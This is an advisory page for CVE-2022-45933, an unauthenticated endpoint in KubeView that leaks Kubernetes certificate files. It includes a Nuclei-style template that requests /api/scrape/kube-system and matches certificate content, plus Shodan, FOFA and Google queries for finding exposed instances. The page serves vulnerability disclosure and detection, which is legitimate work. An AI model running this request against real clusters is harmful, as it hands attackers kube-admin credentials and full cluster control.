CVE-2022-45933: KubeView <=0.1.31 - Information Disclosure

2025-08-01 KubeView PoC Public

Description

KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

PoC

id: CVE-2022-45933

info:
  name: KubeView <=0.1.31 - Information Disclosure
  author: For3stCo1d
  severity: critical
  description: |
    KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    Unauthenticated attackers can access Kubernetes certificate files through the unauthenticated api/scrape/kube-system endpoint, potentially obtaining kube-admin credentials and gaining complete control over the Kubernetes cluster.
  remediation: |
    Upgrade KubeView to a version higher than 0.1.31 to mitigate the information disclosure vulnerability (CVE-2022-45933).
  reference:
    - https://github.com/benc-uk/kubeview/issues/95
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933
    - https://nvd.nist.gov/vuln/detail/CVE-2022-45933
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Henry4E36/POCS
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-45933
    cwe-id: CWE-306
    epss-score: 0.51696
    epss-percentile: 0.98888
    cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: kubeview_project
    product: kubeview
    shodan-query:
      - http.title:"KubeView"
      - http.title:"kubeview"
      - http.favicon.hash:-379154636
    fofa-query:
      - icon_hash=-379154636
      - title="kubeview"
    google-query: intitle:"kubeview"
  tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/scrape/kube-system"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'BEGIN CERTIFICATE'
          - 'END CERTIFICATE'
          - 'kubernetes.io'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cc4e08e994b322ee49984b4072efb9c196d6841479eccdd73e39840833a132ea02204ab85d922f5c9f264278f1bb3a3d45cac7ba3c45c0a34efe545efc40e559d10c:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities